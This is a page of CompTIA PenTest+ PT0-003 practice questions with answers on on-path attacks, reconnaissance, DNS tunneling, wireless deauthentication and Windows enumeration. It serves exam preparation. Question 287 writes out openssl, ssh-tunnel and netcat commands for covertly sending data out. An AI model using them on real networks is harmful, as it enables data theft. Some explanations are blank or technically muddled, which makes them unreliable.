CompTIA PT0-003 Online Practice Questions and Exam Preparation

CompTIA PT0-003 Online Questions & Answers

• Question 281:

  A penetration tester is performing a network security assessment. The tester wants to intercept communication between two users and then view and potentially modify transmitted data.

  Which of the following types of on-path attacks would be best to allow the penetration tester to achieve this result?

  A. DNS spoofing
  B. ARP poisoning
  C. VLAN hopping
  D. SYN flooding
  B. ARP poisoning

  ---

  Explanation

  An on-path attack (previously known as MITM ?Man-in-the-Middle) allows an attacker to intercept and modify communication between two parties.

  ARP poisoning (Option B):

  Attackers send fake ARP replies to associate their MAC address with the IP address of a legitimate device (e.g., gateway).

  This forces traffic to flow through the attacker's system, enabling packet capture and manipulation.

  Tools like Ettercap, Bettercap, and ARP spoofing scripts are commonly used.

  References:

  CompTIA PenTest+ PT0-003 Official Study Guide - "On-Path Attacks and ARP Poisoning"

  Incorrect options:

  Option A (DNS spoofing): Redirects users to malicious domains but does not intercept traffic.

  Option C (VLAN hopping): Allows traffic to traverse VLANs, but does not intercept user communication.

  Option D (SYN flooding): A DoS attack that overwhelms a target with half-open connections, but does not intercept traffic.

• Question 282:

  A penetration tester is performing network reconnaissance. The tester wants to gather information about the network without causing detection mechanisms to flag the reconnaissance activities.

  Which of the following techniques should the tester use?

  A. Sniffing
  B. Banner grabbing
  C. TCP/UDP scanning
  D. Ping sweeps
  A. Sniffing

  ---

  Explanation

  To gather information about the network without causing detection mechanisms to flag the reconnaissance activities, the penetration tester should use sniffing.

  Sniffing:

  Definition: Sniffing involves capturing and analyzing network traffic passing through the network. It is a passive reconnaissance technique that does not generate detectable traffic on the network.

  Tools: Tools like Wireshark and tcpdump are commonly used for sniffing. They capture packets and provide insights into network communications, protocols in use, devices, and potential vulnerabilities.

  Advantages:

  Stealthy: Since sniffing is passive, it does not generate additional traffic that could be detected by intrusion detection systems (IDS) or other monitoring tools.

  Information Gathered: Sniffing can reveal IP addresses, MAC addresses, open ports, running services, and potentially sensitive information transmitted in plaintext.

  Comparison with Other Techniques:

  Banner Grabbing: Active technique that sends requests to a target service to gather information from banners, which can be detected.

  TCP/UDP Scanning: Active technique that sends packets to probe open ports and services, easily detected by network monitoring tools.

  Ping Sweeps: Active technique that sends ICMP echo requests to determine live hosts, also detectable by

  network monitoring.

  References:

  Reconnaissance Phase: Using passive techniques like sniffing during the initial reconnaissance phase helps gather information without alerting the target.

  Network Analysis: Understanding the network topology and identifying key assets and vulnerabilities without generating traffic that could trigger alarms.

  By using sniffing, the penetration tester can gather detailed information about the network in a stealthy manner, minimizing the risk of detection.

• Question 283:

  A penetration tester is contracted to attack an oil rig network to look for vulnerabilities. While conducting the assessment, the support organization of the rig reported issues connecting to corporate applications and upstream services for data acquisitions.

  Which of the following is the MOST likely culprit?

  A. Patch installations
  B. Successful exploits
  C. Application failures
  D. Bandwidth limitations
  B. Successful exploits

  ---

  Explanation

  Successful exploits could cause network disruptions, service outages, or data corruption, which could affect the connectivity and functionality of the oil rig network. Patch installations, application failures, and bandwidth limitations are less likely to be related to the penetration testing activities.

• Question 284:

  A penetration tester gains access to a Windows machine and wants to further enumerate users with native operating system credentials.

  Which of the following should the tester use?

  A. route
  B. nbtstat
  C. net
  D. whoami
  C. net

• Question 285:

  A penetration tester writes the following script, which is designed to hide communication and bypass some restrictions on a client's network:

  

  Which of the following best describes the technique the tester is applying?

  A. DNS poisoning
  B. DNS infiltration
  C. DNS trail
  D. DNS tunneling
  D. DNS tunneling

  ---

  Explanation

  The script is retrieving base64-encoded commands hidden in DNS TXT records and executing them. This is a technique known as DNS tunneling, which allows covert data transmission using DNS queries/ responses -- often used to bypass firewalls or exfiltrate data without detection.

  From the CompTIA PenTest+ PT0-003 Official Study Guide (Chapter 9 - Evading Detection and Exploitation Techniques):

  "DNS tunneling is a covert communication technique where command-and-control instructions or exfiltrated data are encoded into DNS queries and responses, typically using TXT records."

  References:

  CompTIA PenTest+ PT0-003 Official Study Guide, Chapter 9

• Question 286:

  A penetration tester is assessing a wireless network. Although monitoring the correct channel and SSID, the tester is unable to capture a handshake between the clients and the AP.

  Which of the following attacks is the MOST effective to allow the penetration tester to capture a handshake?

  A. Key reinstallation
  B. Deauthentication
  C. Evil twin
  D. Replay
  B. Deauthentication

  ---

  Explanation

  Deauth will make the client connect again

• Question 287:

  A penetration tester discovers data to stage and exfiltrate. The client has authorized movement to the tester's attacking hosts only.

  Which of the following would be most appropriate to avoid alerting the SOC?

  A. Apply UTF-8 to the data and send over a tunnel to TCP port 25.
  B. Apply Base64 to the data and send over a tunnel to TCP port 80.
  C. Apply 3DES to the data and send over a tunnel UDP port 53.
  D. Apply AES-256 to the data and send over a tunnel to TCP port 443.
  D. Apply AES-256 to the data and send over a tunnel to TCP port 443.

  ---

  Explanation

  AES-256 (Advanced Encryption Standard with a 256-bit key) is a symmetric encryption algorithm widely used for securing data. Sending data over TCP port 443, which is typically used for HTTPS, helps to avoid detection by network monitoring systems as it blends with regular secure web traffic.

  Encrypting Data with AES-256:

  Use a secure key and initialization vector (IV) to encrypt the data using the AES-256 algorithm.

  Example encryption command using

  OpenSSL:

  Step-by-Step Explanationopenssl enc -aes-256-cbc -salt -in plaintext.txt -out encrypted.bin -k secretkey

  Setting Up a Secure Tunnel:

  Use a tool like OpenSSH to create a secure tunnel over TCP port 443.

  Example command to set up a tunnel:

  ssh -L 443:targetserver:443 user@intermediatehost

  Transferring Data Over the Tunnel:

  Use a tool like Netcat or SCP to transfer the encrypted data through the tunnel.

  Example Netcat command to send data:

  cat encrypted.bin | nc targetserver 443 Benefits of Using AES-256 and Port 443:

  Security: AES-256 provides strong encryption, making it difficult for attackers to decrypt the data without the key.

  Stealth: Sending data over port 443 helps avoid detection by security monitoring systems, as it appears as regular HTTPS traffic.

  Real-World Example:

  During a penetration test, the tester needs to exfiltrate sensitive data without triggering alerts. By encrypting the data with AES-256 and sending it over a tunnel to TCP port 443, the data exfiltration blends in with normal secure web traffic.

  References from Pentesting Literature:

  Various penetration testing guides and HTB write-ups emphasize the importance of using strong encryption like AES-256 for secure data transfer.

  Techniques for creating secure tunnels and exfiltrating data covertly are often discussed in advanced pentesting resources.

  References:

  Penetration Testing - A Hands-on Introduction to Hacking

  HTB Official Writeups

• Question 288:

  A penetration tester needs to exploit a vulnerability in a wireless network that has weak encryption to perform traffic analysis and decrypt sensitive information.

  Which of the following techniques would best allow the penetration tester to have access to the sensitive information?

  A. Bluejacking
  B. SSID spoofing
  C. Packet sniffing
  D. ARP poisoning
  C. Packet sniffing

  ---

  Explanation

  If a wireless network uses weak encryption (e.g., WEP), attackers can capture and analyze packets to extract sensitive data.

  Packet sniffing (Option C):

  Tools like Wireshark, Aircrack-ng, and Kismet capture network packets.

  Attackers analyze captured traffic to decrypt WEP encryption or extract plaintext credentials.

  References:

  CompTIA PenTest+ PT0-003 Official Study Guide - "Wireless Network Attacks and Sniffing"

  Incorrect options:

  Option A (Bluejacking): Sends unsolicited Bluetooth messages, not for network sniffing.

  Option B (SSID spoofing): Involves creating a fake access point, but does not analyze traffic.

  Option D (ARP poisoning): Used for MITM attacks, but not specific to wireless traffic analysis.

• Question 289:

  A penetration tester assesses an application allow list and has limited command-line access on the Windows system.

  Which of the following would give the penetration tester information that could aid in continuing the test?

  A. mmc.exe
  B. icacls.exe
  C. nltest.exe
  D. rundll.exe
  C. nltest.exe

  ---

  Explanation

  When a penetration tester has limited command-line access on a Windows system, the choice of tool is critical for gathering information to aid in furthering the test. Here's an explanation for each option:

  mmc.exe (Microsoft Management Console):

  icacls.exe:

  nltest.exe:

  rundll.exe:

  Conclusion: nltest.exe is the best choice among the given options as it provides valuable information about the network, domain controllers, and trust relationships. This information is crucial for a penetration tester to plan further actions and understand the domain environment.

• Question 290:

  With one day left to complete the testing phase of an engagement, a penetration tester obtains the following results from an Nmap scan:

  

  Which of the following tools should the tester use to quickly identify a potential attack path?

  A. msfvenom
  B. SearchSploit
  C. sqlmap
  D. BeEF
  B. SearchSploit

  ---

  Explanation

  SearchSploit is a command-line interface for Exploit-DB that allows testers to quickly search for known exploits based on software name and version.

  With Apache 2.2.3, lighttpd 1.4.32, and MySQL, the tester can plug these into SearchSploit to identify vulnerabilities, matching the goal of finding quick attack paths with limited time.

  Other tools:

  msfvenom: Payload generator, not a search tool.

  sqlmap: SQLi exploitation tool, useful for web apps with SQLi, but requires validation of such a vuln first.

  BeEF: Browser exploitation framework, not relevant here.

  References:

  PT0-003 Objective 2.2 & 2.5: Exploit and identify attack paths.

  SearchSploit and Exploit-DB usage are recommended tools in CompTIA's resources.